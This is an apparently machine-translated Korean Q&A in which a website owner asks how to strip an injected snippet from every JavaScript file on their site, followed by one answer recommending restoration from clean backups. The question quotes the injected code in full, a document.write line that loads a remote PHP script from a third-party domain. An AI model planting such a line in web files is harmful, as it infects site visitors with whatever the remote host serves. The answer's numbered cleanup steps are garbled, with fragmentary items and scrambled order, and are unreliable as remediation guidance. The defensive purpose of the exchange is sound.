감염된 자바 스크립트 코드를 치료하는 방법

Question

내 웹 사이트에 바이러스가 감염되었습니다. 모든 자바 스크립트 파일에는 다음 코드가 포함되어 있습니다.

/*a61bd2*/ 
document.write("<script src='http://www.blog-environnement.fr/wp-admin /DxRcTnm8.php?id=128633385' type='text/javascript'></" + "script>"); 
/*/a61bd2*/ 

나는 청소할 수 있지만 코드를 지우려면 각 자바 스크립트를 개별적으로 열어야합니다. 내 웹 사이트 내의 모든 자바 스크립트에서이 코드를 자동으로 지우는 스크립트가 가능한지 궁금합니다.

만약 내가 다시 문제가되고 싶지 않기 때문에 누군가가 나에게 조언을 해줄 수 있다면 가능합니다.

내 영어로는 죄송합니다.

Answer 1

손상된 코드를 정리하지 마십시오. 깨끗한 복사본을 얻고 그 대신 작업하십시오.

1. 는
2. 악성 코드에 대한 워크 스테이션을 확인 오프라인 서버를 가지고 (공격 벡터가 있었다 암호를 훔치는 같은 것을 통해 경우에 그런 식으로)
3. 는
4. 는이 있는지 확인 깨끗한 서버 구축 모든 소프트웨어/당신이 있는지 확인하기 위해 사이트를 모니터링 알려진 좋은 백업
5. 시작에서 귀하의 사이트를 복원
6. 에 따라 라이브러리의 최신 버전
7. 손상된 서버의 로그를 검사하여 해당 공격의 특성을 확인할 수 있는지 확인하십시오.
8. 보안 (손상되지 않은 서버의 클린 백업과 편집 된 버전 모두) 보안 감사.